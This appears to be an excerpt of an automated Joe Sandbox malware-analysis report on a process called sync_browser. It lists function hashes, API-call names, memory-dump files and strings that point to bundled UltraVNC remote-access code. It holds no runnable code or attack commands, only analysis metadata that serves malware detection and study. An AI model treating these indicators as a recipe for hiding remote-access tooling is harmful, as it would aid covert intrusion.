                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateRect$CombineDeleteObjectfree$malloc
                                                                                          • String ID:
                                                                                          • API String ID: 4067307076-0
                                                                                          • Opcode ID: b61e87ee609763207e942b65584275b9d477987c28981c2977f50c6ab867ee76
                                                                                          • Instruction ID: 2b985c961d16962a2812627f4ff09f3296a8ee6fba5c8e61d8b1abc74ed2aa30
                                                                                          • Opcode Fuzzy Hash: b61e87ee609763207e942b65584275b9d477987c28981c2977f50c6ab867ee76
                                                                                          • Instruction Fuzzy Hash: 7C226D77A186818BD724CF25E54066ABBA1F798B84F148135FA8E87B58DF3CE945CF00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: State$CriticalSection$EnterLeave
                                                                                          • String ID:
                                                                                          • API String ID: 1138030011-0
                                                                                          • Opcode ID: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
                                                                                          • Instruction ID: ddafe9ce3ffb2b55b3b7d3f094eea21171439c2ea0692c6a853ad026466e2af7
                                                                                          • Opcode Fuzzy Hash: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
                                                                                          • Instruction Fuzzy Hash: 6E41D82BA3865282F6129B25E50433A96A5FFA0356F110434FD9E875A0CF3DAC4DD320
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DesktopOpen$ClipboardCloseInput
                                                                                          • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                                          • API String ID: 2872304593-3977938048
                                                                                          • Opcode ID: 79ffba6a5e268d0255684b3df970d976629e0ac15b6f1d1aa7ce9095906a10a8
                                                                                          • Instruction ID: e75825b52a3be133804defd0aad9d24d9f81357406dfd1cfea4cf9d3d0ffb6fe
                                                                                          • Opcode Fuzzy Hash: 79ffba6a5e268d0255684b3df970d976629e0ac15b6f1d1aa7ce9095906a10a8
                                                                                          • Instruction Fuzzy Hash: 9412C133A28AC185EB60CB25C8587FD67A5EBA5B84F544135EA4D8BBE5DF3CD449C300
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfileQueryValue$FileModuleNameString
                                                                                          • String ID: UseRegistry$admin$admin_auth
                                                                                          • API String ID: 3374479654-3376419731
                                                                                          • Opcode ID: c974abdd07833f38f99300646e9335ba4a5e549fe6b91c786acd5bf0f72e0e3f
                                                                                          • Instruction ID: 655e791b82501873d0ad92c049bf57bbcc49e69b9cd9d875bd7c7fd742e49828
                                                                                          • Opcode Fuzzy Hash: c974abdd07833f38f99300646e9335ba4a5e549fe6b91c786acd5bf0f72e0e3f
                                                                                          • Instruction Fuzzy Hash: CA313233638A4281EA608B51E8447AAF3A4FBA9784F441139FA8D87B94DF3DD549CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF67E7E166F
                                                                                          • unable to determine legacy authentication method, xrefs: 00007FF67E7E173F
                                                                                          • i, xrefs: 00007FF67E7E1809
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection_errnofreemalloc$AllocCurrentEnterHeapLeaveProcess_callnewhrand
                                                                                          • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$unable to determine legacy authentication method
                                                                                          • API String ID: 2847437661-1576074771
                                                                                          • Opcode ID: 9c70349ac644cdd4acf1d1aca859d57c3c31dfe63f276392e806348dce432cd7
                                                                                          • Instruction ID: 09e0f9b759061ea5cb696b4c82ae6b53eb44bbca58b6da16ed09aaca0cbd0d04
                                                                                          • Opcode Fuzzy Hash: 9c70349ac644cdd4acf1d1aca859d57c3c31dfe63f276392e806348dce432cd7
                                                                                          • Instruction Fuzzy Hash: 5FD19D23B28A8285FB14CB65D8553FC27A2EB94764F144275EE2E9BAD5CF3CD849C340
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$FileModuleNamePrivateProfile
                                                                                          • String ID: Software\UltraVNC$UseRegistry$admin$mslogon
                                                                                          • API String ID: 27673491-2056936749
                                                                                          • Opcode ID: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
                                                                                          • Instruction ID: a20185027f88071c04369e85314a74809eb3fd9f9da9de85b4bb27f95dda87f0
                                                                                          • Opcode Fuzzy Hash: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
                                                                                          • Instruction Fuzzy Hash: 26213133A28B4292E7608F14F4907AAB3A4FB95354F801136F69D86A59DF7DD149CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueVersionWindows
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 337752880-3733053543
                                                                                          • Opcode ID: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                                                          • Instruction ID: 20818e8409b72a00edeac4be7020cec09c3d6ba53f943700c7eb58ef0799bab5
                                                                                          • Opcode Fuzzy Hash: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                                                          • Instruction Fuzzy Hash: 84116072A28A4296E760DB64F8593AAB3A4FB94744F800035F58E86A94DF7CD04DCB00
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$RectVisible$Foreground
                                                                                          • String ID:
                                                                                          • API String ID: 2499709836-0
                                                                                          • Opcode ID: fd4ffa4dc86c0a1f228acc40c3b9d3b4e4fe0aed8a44007872f92d5eb7780ab3
                                                                                          • Instruction ID: 7a7c01dd6a3dbe0c504518a020bc17a34045ea8d55df61f339868ecc168ab8d1
                                                                                          • Opcode Fuzzy Hash: fd4ffa4dc86c0a1f228acc40c3b9d3b4e4fe0aed8a44007872f92d5eb7780ab3
                                                                                          • Instruction Fuzzy Hash: E5D14E73B246918EE714CFB9D4406AC37B6FB58748F105139EE0DA7B49DE38945ACB40
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$FindFirstModuleName
                                                                                          • String ID: *.dsm
                                                                                          • API String ID: 1519589655-1970359449
                                                                                          • Opcode ID: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                                                          • Instruction ID: 734bb106c044b2b3c917796f1e23cdd47802fafe2575b308fa07ef7509c65789
                                                                                          • Opcode Fuzzy Hash: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
                                                                                          • Instruction Fuzzy Hash: 8A317622B2868595E760CB35E9443BBA394FB587B0F405331EA7E836D4DE2DD10DC700
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: PrivateProfile$FileModuleNameQueryValue
                                                                                          • String ID: UseRegistry$admin$admin_auth
                                                                                          • API String ID: 1028385882-3376419731
                                                                                          • Opcode ID: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                                                          • Instruction ID: 0779ceac0bf7bf9d9ca50721234d632032ba758e299b6060b6f19bce8dcb00ff
                                                                                          • Opcode Fuzzy Hash: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
                                                                                          • Instruction Fuzzy Hash: CA213533638A46C5FB50CB50E8446AAB3A4FB99794F801135FA5E83B58CF3DD949CB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AsyncState$Virtual
                                                                                          • String ID: down$vnckeymap.cpp : new state %d (%s)$vnckeymap.cpp : setshiftstate %d - (%s->%s)
                                                                                          • API String ID: 2891131044-1915745809
                                                                                          • Opcode ID: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                                                          • Instruction ID: 9672d8912079a810187a26feba555bbe0bcb58369c9f5c5c9862f5d4e78c56ad
                                                                                          • Opcode Fuzzy Hash: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
                                                                                          • Instruction Fuzzy Hash: 7F11BF23B38E9282E6118F14F4001AAA769FBA8749F580536FD8EC76A5CF3CD55EC740
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueWindows
                                                                                          • String ID: SeShutdownPrivilege
                                                                                          • API String ID: 1314775590-3733053543
                                                                                          • Opcode ID: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
                                                                                          • Instruction ID: dfea1f3c86b4736e4fdecf0656e99eb5bbba217affc6903466eaba0fbc2fdab2
                                                                                          • Opcode Fuzzy Hash: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
                                                                                          • Instruction Fuzzy Hash: FF014076A28A4291F750DB24F8552AAB3A4FF99744F505035F64E87664DF3DD04CCB00
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close$FileModuleNamePrivateProfile
                                                                                          • String ID: UseRegistry$admin
                                                                                          • API String ID: 3032973919-2802730080
                                                                                          • Opcode ID: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
                                                                                          • Instruction ID: 171d48f5ab5d27fa99b3acea3c66aa4dce28c17491a7a3139fb7515f6109e66b
                                                                                          • Opcode Fuzzy Hash: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
                                                                                          • Instruction Fuzzy Hash: 60014427E39A0381FE61AB54E4643B5A364FFA6744F800536F91EC6561CE3DE54DC710
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true
                                                                                          • Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
